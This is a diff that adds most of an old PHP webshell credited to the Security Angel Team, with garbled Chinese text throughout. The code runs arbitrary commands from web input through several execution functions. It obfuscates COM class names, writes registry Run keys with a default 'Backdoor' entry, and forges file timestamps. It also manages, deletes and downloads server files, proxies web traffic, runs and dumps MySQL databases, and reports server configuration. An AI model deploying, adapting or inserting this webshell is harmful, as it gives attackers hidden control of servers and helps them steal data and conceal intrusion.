+		header("Accept-Ranges: bytes");
+		header("Accept-Length: ".strlen($code));
+		header("Content-Disposition: attachment;filename=".$_SERVER['HTTP_HOST']."_Files.tar.gz");
+		echo $code;
+		exit;
+	} else {
+		echo "ÇëÑ¡ÔñÒª´ò°üÏÂÔصÄÎļþ!";
+	}
+}
+
+// Shell.Application ÔËÐгÌÐò
+elseif(($_POST['do'] == 'programrun') AND !empty($_POST['program'])) {
+	$shell= &new COM('Sh'.'el'.'l.Appl'.'ica'.'tion');
+	$a = $shell->ShellExecute($_POST['program'],$_POST['prog']);
+	echo ($a=='0') ? "³ÌÐòÒѾ­³É¹¦Ö´ÐÐ!" : "³ÌÐòÔËÐÐʧ°Ü!";
+}
+
+// ²é¿´PHPÅäÖòÎÊý×´¿ö
+elseif(($_POST['do'] == 'viewphpvar') AND !empty($_POST['phpvarname'])) {
+	echo "ÅäÖòÎÊý ".$_POST['phpvarname']." ¼ì²â½á¹û: ".getphpcfg($_POST['phpvarname'])."";
+}
+
+// ¶Áȡע²á±í
+elseif(($regread) AND !empty($_POST['readregname'])) {
+	$shell= &new COM('WSc'.'rip'.'t.Sh'.'ell');
+	var_dump(@$shell->RegRead($_POST['readregname']));
+}
+
+// дÈë×¢²á±í
+elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype']) AND !empty($_POST['regval'])) {
+	$shell= &new COM('W'.'Scr'.'ipt.S'.'hell');
+	$a = @$shell->RegWrite($_POST['writeregname'], $_POST['regval'], $_POST['regtype']);
+	echo ($a=='0') ? "дÈë×¢²á±í½¡Öµ³É¹¦!" : "дÈë ".$_POST['regname'].", ".$_POST['regval'].", ".$_POST['regtype']." ʧ°Ü!";
+}
+
+// ɾ³ý×¢²á±í
+elseif(($regdelete) AND !empty($_POST['delregname'])) {
+	$shell= &new COM('WS'.'cri'.'pt.S'.'he'.'ll');
+	$a = @$shell->RegDelete($_POST['delregname']);
+	echo ($a=='0') ? "ɾ³ý×¢²á±í½¡Öµ³É¹¦!" : "ɾ³ý ".$_POST['delregname']." ʧ°Ü!";
+}
+
+else {
+	echo "±¾³ÌÐòÓÉ <a href=\"http://www.4ngel.net\" target=\"_blank\">Security Angel</a> С×é angel [<a href=\"http://www.bugkidz.org\" target=\"_blank\">BST</a>] ¶ÀÁ¢¿ª·¢,¿ÉÔÚ <a href=\"http://www.4ngel.net\" target=\"_blank\">www.4ngel.net</a> ÏÂÔØ×îа汾.";
+}
+
+echo "</b></p>\n";
+/*===================== Ö´ÐвÙ×÷ ½áÊø =====================*/
+
+if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
+	$tb->tableheader();
+?>
+  <tr bgcolor="#cccccc">
+    <td align="center" nowrap width="27%"><b>Îļþ</b></td>
+	<td align="center" nowrap width="16%"><b>´´½¨ÈÕÆÚ</b></td>
+    <td align="center" nowrap width="16%"><b>×îºóÐÞ¸Ä</b></td>
+    <td align="center" nowrap width="11%"><b>´óС</b></td>
+    <td align="center" nowrap width="6%"><b>ÊôÐÔ</b></td>
+    <td align="center" nowrap width="24%"><b>²Ù×÷</b></td>
+  </tr>
+<?php
+// Ŀ¼Áбí
+$dirs=@opendir($dir);
+$dir_i = '0';
+while ($file=@readdir($dirs)) {
+	$filepath="$dir/$file";
+	$a=@is_dir($filepath);
+	if($a=="1"){
+		if($file!=".." && $file!=".")	{
+			$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
+			$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
+			$dirperm=substr(base_convert(fileperms($filepath),10,8),-4);
+			echo "<tr class=".getrowbg().">\n";
+			echo "  <td style=\"padding-left: 5px;\">[<a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n";
+			echo "  <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n";
+			echo "  <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n";
+			echo "  <td align=\"center\" nowrap class=\"smlfont\">&lt;dir&gt;</td>\n";
+			echo "  <td align=\"center\" nowrap class=\"smlfont\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$dirperm</a></td>\n";
+			echo "  <td align=\"center\" nowrap><a href=\"#\" onclick=\"really('".urlencode($dir)."','".urlencode($file)."','ÄãÈ·¶¨ÒªÉ¾³ý $file Ŀ¼Âð? \\n\\nÈç¹û¸ÃĿ¼·Ç¿Õ,´Ë´Î²Ù×÷½«»áɾ³ý¸ÃĿ¼ÏµÄËùÓÐÎļþ!','1')\">ɾ³ý</a></td>\n";
+			echo "</tr>\n";
+			$dir_i++;
+		} else {
+			if($file=="..") {
+				echo "<tr class=".getrowbg().">\n";
+				echo "  <td nowrap colspan=\"6\" style=\"padding-left: 5px;\"><a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\">·µ»ØÉϼ¶Ä¿Â¼</a></td>\n";
+				echo "</tr>\n";
+			}
+		}
+	}
+}// while
+@closedir($dirs); 
+?>
+<tr bgcolor="#cccccc">
+  <td colspan="6" height="5"></td>
+</tr>
+<FORM action="" method="POST">
+<?
+// ÎļþÁбí
+$dirs=@opendir($dir);
+$file_i = '0';
+while ($file=@readdir($dirs)) {
+	$filepath="$dir/$file";
+	$a=@is_dir($filepath);
+	if($a=="0"){		
+		$size=@filesize($filepath);
+		$size=$size/1024 ;
+		$size= @number_format($size, 3);
+		if (@filectime($filepath) == @filemtime($filepath)) {
+			$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
+			$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
+		} else {
+			$ctime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filectime($filepath))."</span>";
+			$mtime="<span class=\"redfont\">".@date("Y-m-d H:i:s",@filemtime($filepath))."</span>";
+		}
+		@$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4);
+		echo "<tr class=".getrowbg().">\n";
+		echo "  <td style=\"padding-left: 5px;\">";
+		echo "<INPUT type=checkbox value=1 name=dl[$filepath]>";
+		echo "<a href=\"$filepath\" target=\"_blank\">$file</a></td>\n";
+		echo "  <td align=\"center\" nowrap class=\"smlfont\">$ctime</td>\n";
+		echo "  <td align=\"center\" nowrap class=\"smlfont\">$mtime</td>\n";
+		echo "  <td align=\"right\" nowrap class=\"smlfont\"><span class=\"redfont\">$size</span> KB</td>\n";
+		echo "  <td align=\"center\" nowrap class=\"smlfont\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$fileperm</a></td>\n";
+		echo "  <td align=\"center\" nowrap><a href=\"?downfile=".urlencode($filepath)."\">ÏÂÔØ</a> | <a href=\"?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\">±à¼­</a> | <a href=\"#\" onclick=\"really('".urlencode($dir)."','".urlencode($filepath)."','ÄãÈ·¶¨ÒªÉ¾³ý $file ÎļþÂð?','2')\">ɾ³ý</a> | <a href=\"?action=rename&dir=".urlencode($dir)."&fname=".urlencode($filepath)."\">¸ÄÃû</a> | <a href=\"?action=newtime&dir=".urlencode($dir)."&file=".urlencode($filepath)."\">ʱ¼ä</a></td>\n";
+		echo "</tr>\n";
+		$file_i++;
+	}
+}// while
+@closedir($dirs); 
+$tb->tdbody('<table width="100%" border="0" cellpadding="2" cellspacing="0" align="center"><tr><td>'.$tb->makeinput('chkall','on','onclick="CheckAll(this.form)"','checkbox','30','').' '.$tb->makeinput('downrar','Ñ¡ÖÐÎļþ´ò°üÏÂÔØ','','submit').'</td><td align="right">'.$dir_i.' ¸öĿ¼ / '.$file_i.' ¸öÎļþ</td></tr></table>','center',getrowbg(),'','','6');
+
+echo "</FORM>\n";
+echo "</table>\n";
+}// end dir
+
+elseif ($_GET['action'] == "editfile") {
+	if(empty($newfile)) {
+		$filename="$dir/$editfile";
+		$fp=@fopen($filename,"r");
+		$contents=@fread($fp, filesize($filename));
+		@fclose($fp);
+		$contents=htmlspecialchars($contents);
+	}else{
+		$editfile=$newfile;
+		$filename = "$dir/$editfile";
+	}
+	$action = "?dir=".urlencode($dir)."&editfile=".$editfile;
+	$tb->tableheader();
+	$tb->formheader($action,'н¨/±à¼­Îļþ');
+	$tb->tdbody('µ±Ç°Îļþ: '.$tb->makeinput('editfilename',$filename).' ÊäÈëÐÂÎļþÃûÔò½¨Á¢ÐÂÎļþ');
+	$tb->tdbody($tb->maketextarea('filecontent',$contents));
+	$tb->makehidden('do','doeditfile');
+	$tb->formfooter('1','30');
+}//end editfile
+
+elseif ($_GET['action'] == "rename") {
+	$nowfile = (isset($_POST['newname'])) ? $_POST['newname'] : basename($_GET['fname']);
+	$action = "?dir=".urlencode($dir)."&fname=".urlencode($fname);
+	$tb->tableheader();
+	$tb->formheader($action,'ÐÞ¸ÄÎļþÃû');
+	$tb->makehidden('oldname',$dir."/".$nowfile);
+	$tb->makehidden('dir',$dir);
+	$tb->tdbody('µ±Ç°ÎļþÃû: '.basename($nowfile));
+	$tb->tdbody('¸ÄÃûΪ: '.$tb->makeinput('newname'));
+	$tb->makehidden('do','rename');
+	$tb->formfooter('1','30');
+}//end rename
+
+elseif ($_GET['action'] == "fileperm") {
+	$action = "?dir=".urlencode($dir)."&file=".$file;
+	$tb->tableheader();
+	$tb->formheader($action,'ÐÞ¸ÄÎļþÊôÐÔ');
+	$tb->tdbody('ÐÞ¸Ä '.$file.' µÄÊôÐÔΪ: '.$tb->makeinput('fileperm',substr(base_convert(fileperms($dir.'/'.$file),10,8),-4)));
+	$tb->makehidden('file',$file);
+	$tb->makehidden('dir',urlencode($dir));
+	$tb->makehidden('do','editfileperm');
+	$tb->formfooter('1','30');
+}//end fileperm
+
+elseif ($_GET['action'] == "newtime") {
+	$action = "?dir=".urlencode($dir);
+	$cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
+	$tb->tableheader();
+	$tb->formheader($action,'¿Ë¡Îļþ×îºóÐÞ¸Äʱ¼ä');
+	$tb->tdbody("ÐÞ¸ÄÎļþ: ".$tb->makeinput('curfile',$file,'readonly')." ¡ú Ä¿±êÎļþ: ".$tb->makeinput('tarfile','ÐèÌîÍêÕû·¾¶¼°ÎļþÃû'),'center','2','30');
+	$tb->makehidden('do','domodtime');
+	$tb->formfooter('','30');
+	$tb->formheader($action,'×Ô¶¨ÒåÎļþ×îºóÐÞ¸Äʱ¼ä');
+	$tb->tdbody('<br><ul><li>ÓÐЧµÄʱ¼ä´ÁµäÐÍ·¶Î§ÊÇ´Ó¸ñÁÖÍþÖÎʱ¼ä 1901 Äê 12 Ô 13 ÈÕ ÐÇÆÚÎå 20:45:54 µ½ 2038Äê 1 Ô 19 ÈÕ ÐÇÆÚ¶þ 03:14:07<br>(¸ÃÈÕÆÚ¸ù¾Ý 32 λÓзûºÅÕûÊýµÄ×îСֵºÍ×î´óÖµ¶øÀ´)</li><li>˵Ã÷: ÈÕÈ¡ 01 µ½ 30 Ö®¼ä, ʱȡ 0 µ½ 24 Ö®¼ä, ·ÖºÍÃëÈ¡ 0 µ½ 60 Ö®¼ä!</li></ul>','left');
+	$tb->tdbody('µ±Ç°ÎļþÃû: '.$file);
+	$tb->makehidden('curfile',$file);
+	$tb->tdbody('ÐÞ¸ÄΪ: '.$tb->makeinput('year','1984','','text','4').' Äê '.$tb->makeselect(array('name'=>'month','option'=>$cachemonth,'selected'=>'October')).' Ô '.$tb->makeinput('data','18','','text','2').' ÈÕ '.$tb->makeinput('hour','20','','text','2').' ʱ '.$tb->makeinput('minute','00','','text','2').' ·Ö '.$tb->makeinput('second','00','','text','2').' Ãë','center','2','30');
+	$tb->makehidden('do','modmytime');
+	$tb->formfooter('1','30');
+}//end newtime
+
+elseif ($_GET['action'] == "shell") {
+	$action = "??action=shell&dir=".urlencode($dir);
+	$tb->tableheader();
+	$tb->tdheader('WebShell Mode');
+
+	if (substr(PHP_OS, 0, 3) == 'WIN') {
+		$program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32\cmd.exe";
+		$prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/log.txt";
+		echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"POST\">\n";
+		$tb->tdbody('ÎÞ»ØÏÔÔËÐгÌÐò ¡ú Îļþ: '.$tb->makeinput('program',$program).' ²ÎÊý: '.$tb->makeinput('prog',$prog,'','text','40').' '.$tb->makeinput('','Run','','submit'),'center','2','35');
+		$tb->makehidden('do','programrun');
+		echo "</form>\n";
+	}
+
+	echo "<form action=\"?action=shell&dir=".urlencode($dir)."\" method=\"POST\">\n";
+	$tb->tdbody('Ìáʾ:Èç¹ûÊä³ö½á¹û²»ÍêÈ«,½¨Òé°ÑÊä³ö½á¹ûдÈëÎļþ.ÕâÑù¿ÉÒԵõ½È«²¿ÄÚÈÝ.');
+	
+	$execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen');
+
+	$tb->tdbody('Ñ¡ÔñÖ´Ðк¯Êý: '.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' ÊäÈëÃüÁî: '.$tb->makeinput('command',$_POST['command'],'','text','60').' '.$tb->makeinput('','Run','','submit'));
+?>
+  <tr class="secondalt">
+    <td align="center"><textarea name="textarea" cols="100" rows="25" readonly><?php
+	if (!empty($_POST['command'])) {
+		if ($execfunc=="system") {
+			system($_POST['command']);
+		} elseif ($execfunc=="passthru") {
+			passthru($_POST['command']);
+		} elseif ($execfunc=="exec") {
+			$result = exec($_POST['command']);
+			echo $result;
+		} elseif ($execfunc=="shell_exec") {
+			$result=shell_exec($_POST['command']);
+			echo $result;	
+		} elseif ($execfunc=="popen") {
+			$pp = popen($_POST['command'], 'r');
+			$read = fread($pp, 2096);
+			echo $read;
+			pclose($pp);
+		} elseif ($execfunc=="wscript") {
+			$wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or die("PHP Create COM WSHSHELL failed");
+			$exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['command']."");
+			$stdout = $exec->StdOut();
+			$stroutput = $stdout->ReadAll();
+			echo $stroutput;
+		} else {
+			system($_POST['command']);
+		}
+	}
+	?></textarea></td>
+  </tr>  
+  </form>
+</table>
+<?php
+}//end shell
+
+elseif ($_GET['action'] == "reg") {
+	$action = '?action=reg';
+	$regname = isset($_POST['regname']) ? $_POST['regname'] : 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNumber';
+	$registre = isset($_POST['registre']) ? $_POST['registre'] : 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Backdoor';
+	$regval = isset($_POST['regval']) ? $_POST['regval'] : 'c:\winnt\backdoor.exe';
+	$delregname = $_POST['delregname'];
+	$tb->tableheader();
+	$tb->formheader($action,'¶Áȡע²á±í');
+	$tb->tdbody('¼üÖµ: '.$tb->makeinput('readregname',$regname,'','text','100').' '.$tb->makeinput('regread','¶ÁÈ¡','','submit'),'center','2','50');
+	echo "</form>";
+
+	$tb->formheader($action,'дÈë×¢²á±í');
+	$cacheregtype = array('REG_SZ'=>'REG_SZ','REG_BINARY'=>'REG_BINARY','REG_DWORD'=>'REG_DWORD','REG_MULTI_SZ'=>'REG_MULTI_SZ','REG_EXPAND_SZ'=>'REG_EXPAND_SZ');
+	$tb->tdbody('¼üÖµ: '.$tb->makeinput('writeregname',$registre,'','text','56').' ÀàÐÍ: '.$tb->makeselect(array('name'=>'regtype','option'=>$cacheregtype,'selected'=>$regtype)).' Öµ:  '.$tb->makeinput('regval',$regval,'','text','15').' '.$tb->makeinput('regwrite','дÈë','','submit'),'center','2','50');
+	echo "</form>";
+
+	$tb->formheader($action,'ɾ³ý×¢²á±í');
+	$tb->tdbody('¼üÖµ: '.$tb->makeinput('delregname',$delregname,'','text','100').' '.$tb->makeinput('regdelete','ɾ³ý','','submit'),'center','2','50');
+	echo "</form>";
+	$tb->tablefooter();
+}//end reg
+
+elseif ($_GET['action'] == "proxy") {
+	$action = '?action=proxy';
+	$tb->tableheader();
+	$tb->formheader($action,'ÔÚÏß´úÀí','proxyframe');
+	$tb->tdbody('<br><ul><li>Óñ¾¹¦ÄܽöʵÏÖ¼òµ¥µÄ HTTP ´úÀí,²»»áÏÔʾʹÓÃÏà¶Ô·¾¶µÄͼƬ¡¢Á´½Ó¼°CSSÑùʽ±í.</li><li>Óñ¾¹¦ÄÜ¿ÉÒÔͨ¹ý±¾·þÎñÆ÷ä¯ÀÀÄ¿±êURL,µ«²»Ö§³Ö SQL Injection ̽²âÒÔ¼°Ä³Ð©ÌØÊâ×Ö·û.</li><li>Óñ¾¹¦ÄÜä¯ÀÀµÄ URL,ÔÚÄ¿±êÖ÷»úÉÏÁôϵÄIP¼Ç¼ÊÇ : '.$_SERVER['REMOTE_ADDR'].'</li></ul>','left');
+	$tb->tdbody('URL: '.$tb->makeinput('url','http://www.4ngel.net','','text','100').' '.$tb->makeinput('','ä¯ÀÀ','','submit'),'center','1','40');
+	$tb->tdbody('<iframe name="proxyframe" frameborder="0" width="765" height="400" marginheight="0" marginwidth="0" scrolling="auto" src="http://www.4ngel.net"></iframe>');
+	echo "</form>";
+	$tb->tablefooter();
+}//end proxy
+
+elseif ($_GET['action'] == "sql") {
+	$action = '?action=sql';
+	$servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost';
+	$dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root';
+	$dbpassword = $_POST['dbpassword'];
+	$dbname = $_POST['dbname'];
+	$sql_query = $_POST['sql_query'];
+	$tb->tableheader();
+	$tb->formheader($action,'Ö´ÐÐ SQL Óï¾ä');
+	$tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','Á¬½Ó','','submit'));
+	$tb->tdbody($tb->maketextarea('sql_query',$sql_query,'85','10'));
+	$tb->makehidden('do','query');
+	$tb->formfooter('1','30');
+}//end sql query
+
+elseif ($_GET['action'] == "sqlbak") {
+	$action = '?action=sqlbak';
+	$servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost';
+	$dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root';
+	$dbpassword = $_POST['dbpassword'];
+	$dbname = $_POST['dbname'];
+	$tb->tableheader();
+	$tb->formheader($action,'±¸·Ý MySQL Êý¾Ý¿â');
+	$tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','Á¬½Ó','','submit'));
+	@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname);
+    $tables = @mysql_list_tables($dbname);
+    while ($table = @mysql_fetch_row($tables)) {
+		$cachetables[$table[0]] = $table[0];
+    }
+    @mysql_free_result($tables);
+	if (empty($cachetables)) {
+		$tb->tdbody('<b>ÄúûÓÐÁ¬½ÓÊý¾Ý¿â or µ±Ç°Êý¾Ý¿âûÓÐÈκÎÊý¾Ý±í</b>');
+	} else {
+		$tb->tdbody('<table border="0" cellpadding="3" cellspacing="1"><tr><td valign="top">ÇëÑ¡Ôñ±í:</td><td>'.$tb->makeselect(array('name'=>'table[]','option'=>$cachetables,'multiple'=>1,'size'=>15,'css'=>1)).'</td></tr><tr nowrap><td><input type="radio" name="backuptype" value="server" checked> ±¸·ÝÊý¾ÝËù±£´æµÄ·¾¶:</td><td>'.$tb->makeinput('path',$pathname.'/'.$_SERVER['HTTP_HOST'].'_MySQL.sql','','text','50').'</td></tr><tr nowrap><td colspan="2"><input type="radio" name="backuptype" value="download"> Ö±½ÓÏÂÔص½±¾µØ (ÊʺÏÊý¾ÝÁ¿½ÏСµÄÊý¾Ý¿â)</td></tr></table>');
+		$tb->makehidden('do','backupmysql');
+		$tb->formfooter('0','30');
+	}
+	$tb->tablefooter();
+	@mysql_close();
+}//end sql backup
+
+elseif ($_GET['action'] == "phpenv") {
+	$upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "²»ÔÊÐíÉÏ´«";
+	$adminmail=(isset($_SERVER['SERVER_ADMIN'])) ? "<a href=\"mailto:".$_SERVER['SERVER_ADMIN']."\">".$_SERVER['SERVER_ADMIN']."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
+	if ($dis_func == "") {
+		$dis_func = "No";
+	}else {
+		$dis_func = str_replace(" ","<br>",$dis_func);
+		$dis_func = str_replace(",","<br>",$dis_func);
+	}
+	$phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
+		$info = array(
+			0  => array("·þÎñÆ÷ʱ¼ä",date("YÄêmÔÂdÈÕ h:i:s",time())),
+			1  => array("·þÎñÆ÷ÓòÃû","<a href=\"http://".$_SERVER['SERVER_NAME']."\" target=\"_blank\">".$_SERVER['SERVER_NAME']."</a>"),
+			2  => array("·þÎñÆ÷IPµØÖ·",gethostbyname($_SERVER['SERVER_NAME'])),
+			3  => array("·þÎñÆ÷²Ù×÷ϵͳ",PHP_OS),
+			5  => array("·þÎñÆ÷²Ù×÷ϵͳÎÄ×Ö±àÂë",$_SERVER['HTTP_ACCEPT_LANGUAGE']),
+			6  => array("·þÎñÆ÷½âÒëÒýÇæ",$_SERVER['SERVER_SOFTWARE']),
+			7  => array("Web·þÎñ¶Ë¿Ú",$_SERVER['SERVER_PORT']),
+			8  => array("PHPÔËÐз½Ê½",strtoupper(php_sapi_name())),
+			9  => array("PHP°æ±¾",PHP_VERSION),
+			10 => array("ÔËÐÐÓÚ°²È«Ä£Ê½",getphpcfg("safemode")),
+			11 => array("·þÎñÆ÷¹ÜÀíÔ±",$adminmail),
+			12 => array("±¾Îļþ·¾¶",__FILE__),
+
+			13 => array("ÔÊÐíʹÓà URL ´ò¿ªÎļþ allow_url_fopen",getphpcfg("allow_url_fopen")),
+			14 => array("ÔÊÐí¶¯Ì¬¼ÓÔØÁ´½Ó¿â enable_dl",getphpcfg("enable_dl")),
+			15 => array("ÏÔʾ´íÎóÐÅÏ¢ display_errors",getphpcfg("display_errors")),
+			16 => array("×Ô¶¯¶¨ÒåÈ«¾Ö±äÁ¿ register_globals",getphpcfg("register_globals")),
+			17 => array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc")),
+			18 => array("³ÌÐò×î¶àÔÊÐíʹÓÃÄÚ´æÁ¿ memory_limit",getphpcfg("memory_limit")),
+			19 => array("POST×î´ó×Ö½ÚÊý post_max_size",getphpcfg("post_max_size")),
+			20 => array("ÔÊÐí×î´óÉÏ´«Îļþ upload_max_filesize",$upsize),
+			21 => array("³ÌÐò×ÔËÐÐʱ¼ä max_execution_time",getphpcfg("max_execution_time")."Ãë"),
+			22 => array("±»½ûÓõĺ¯Êý disable_functions",$dis_func),
+			23 => array("phpinfo()",$phpinfo),
+			24 => array("Ä¿Ç°»¹ÓпÕÓà¿Õ¼ädiskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),
+
+			25 => array("ͼÐδ¦Àí GD Library",getfun("imageline")),
+			26 => array("IMAPµç×ÓÓʼþϵͳ",getfun("imap_close")),
+			27 => array("MySQLÊý¾Ý¿â",getfun("mysql_close")),
+			28 => array("SyBaseÊý¾Ý¿â",getfun("sybase_close")),
+			29 => array("OracleÊý¾Ý¿â",getfun("ora_close")),
+			30 => array("Oracle 8 Êý¾Ý¿â",getfun("OCILogOff")),
+			31 => array("PRELÏàÈÝÓï·¨ PCRE",getfun("preg_match")),
+			32 => array("PDFÎĵµÖ§³Ö",getfun("pdf_close")),
+			33 => array("Postgre SQLÊý¾Ý¿â",getfun("pg_close")),
+			34 => array("SNMPÍøÂç¹ÜÀíЭÒé",getfun("snmpget")),
+			35 => array("ѹËõÎļþÖ§³Ö(Zlib)",getfun("gzclose")),
+			36 => array("XML½âÎö",getfun("xml_set_object")),
+			37 => array("FTP",getfun("ftp_login")),
+			38 => array("ODBCÊý¾Ý¿âÁ¬½Ó",getfun("odbc_close")),
+			39 => array("SessionÖ§³Ö",getfun("session_start")),
+			40 => array("SocketÖ§³Ö",getfun("fsockopen")),
+		); 
+
+	$tb->tableheader();
+	echo "<form action=\"?action=phpenv\" method=\"POST\">\n";
+	$tb->tdbody('<b>²é¿´PHPÅäÖòÎÊý×´¿ö</b>','left','1','30','style="padding-left: 5px;"');
+	$tb->tdbody('ÇëÊäÈëÅäÖòÎÊý(Èç:magic_quotes_gpc): '.$tb->makeinput('phpvarname','','','text','40').' '.$tb->makeinput('','²é¿´','','submit'),'left','2','30','style="padding-left: 5px;"');
+	$tb->makehidden('do','viewphpvar');
+	echo "</form>\n";
+	$hp = array(0=> '·þÎñÆ÷ÌØÐÔ', 1=> 'PHP»ù±¾ÌØÐÔ', 2=> '×é¼þÖ§³Ö×´¿ö');
+	for ($a=0;$a<3;$a++) {
+		$tb->tdbody('<b>'.$hp[1].'</b>','left','1','30','style="padding-left: 5px;"');
+?>
+  <tr class="secondalt">
+    <td>
+      <table width="100%" border="0" cellpadding="0" cellspacing="0">
+<?php
+		if ($a==0) {
+			for($i=0;$i<=12;$i++) {
+				echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
+			}
+		} elseif ($a == 1) {
+			for ($i=13;$i<=24;$i++) {
+				echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
+			}
+		} elseif ($a == 2) {
+			for ($i=25;$i<=40;$i++) {
+				echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
+			}
+		}
+?>
+      </table>
+    </td>
+  </tr>
+<?php
+	}//for
+echo "</table>";
+}//end phpenv
+?>
+<hr width="775" noshade>
+<table width="775" border="0" cellpadding="0">
+  <tr>
+    <td>Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved.</td>
+    <td align="right"><?php
+	debuginfo();
+	ob_end_flush();	
+	?></td>
+  </tr>
+</table>
+</center>
+</body>
+</html>
+
+<?php
+
+/*======================================================
+º¯Êý¿â
+======================================================*/
+
+	// µÇ½Èë¿Ú
+	function loginpage() {
+?>
+<style type="text/css">
+input {font-family: "Verdana";font-size: "11px";BACKGROUND-COLOR: "#FFFFFF";height: "18px";border: "1px solid #666666";}
+</style>
+<form method="POST" action="">
+<span style="font-size: 11px; font-family: Verdana">Password: </span><input name="adminpass" type="password" size="20">
+<input type="hidden" name="do" value="login">
+<input type="submit" value="Login">
+</form>
+<?php
+		exit;
+	}//end loginpage()
+
+	// Ò³Ãæµ÷ÊÔÐÅÏ¢
+	function debuginfo() {
+		global $starttime;
+		$mtime = explode(' ', microtime());
+		$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
+		echo "Processed in $totaltime second(s)";
+	}
+
+	// È¥µôתÒå×Ö·û
+	function stripslashes_array(&$array) {
+		while(list($key,$var) = each($array)) {
+			if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
+				if (is_string($var)) {
+					$array[$key] = stripslashes($var);
+				}
+				if (is_array($var))  {
+					$array[$key] = stripslashes_array($var);
+				}
+			}
+		}
+		return $array;
+	}
+
+	// ɾ³ýĿ¼
+	function deltree($deldir) {
+		$mydir=@dir($deldir);	
+		while($file=$mydir->read())	{ 		
+			if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) { 
+				@chmod("$deldir/$file",0777);
+				deltree("$deldir/$file"); 
+			}
+			if (is_file("$deldir/$file")) {
+				@chmod("$deldir/$file",0777);
+				@unlink("$deldir/$file");
+			}
+		} 
+		$mydir->close(); 
+		@chmod("$deldir",0777);
+		return (@rmdir($deldir)) ? 1 : 0;
+	} 
+
+	// Åж϶ÁдÇé¿ö
+	function dir_writeable($dir) {
+		if (!is_dir($dir)) {
+			@mkdir($dir, 0777);
+		}
+		if(is_dir($dir)) {
+			if ($fp = @fopen("$dir/test.txt", 'w')) {
+				@fclose($fp);
+				@unlink("$dir/test.txt");
+				$writeable = 1;
+			} else {
+				$writeable = 0;
+			}
+		}
+		return $writeable;
+	}
+
+	// ±í¸ñÐмäµÄ±³¾°É«Ìæ»»
+	function getrowbg() {
+		global $bgcounter;
+		if ($bgcounter++%2==0) {
+			return "firstalt";
+		} else {
+			return "secondalt";
+		}
+	}
+
+	// »ñÈ¡µ±Ç°µÄÎļþϵͳ·¾¶
+	function getPath($mainpath, $relativepath) {
+		global $dir;
+		$mainpath_info           = explode('/', $mainpath);
+		$relativepath_info       = explode('/', $relativepath);
+		$relativepath_info_count = count($relativepath_info);
+		for ($i=0; $i<$relativepath_info_count; $i++) {
+			if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue;
+			if ($relativepath_info[$i] == '..') {
+				$mainpath_info_count = count($mainpath_info);
+				unset($mainpath_info[$mainpath_info_count-1]);
+				continue;
+			}
+			$mainpath_info[count($mainpath_info)] = $relativepath_info[$i];
+		} //end for
+		return implode('/', $mainpath_info);
+	}
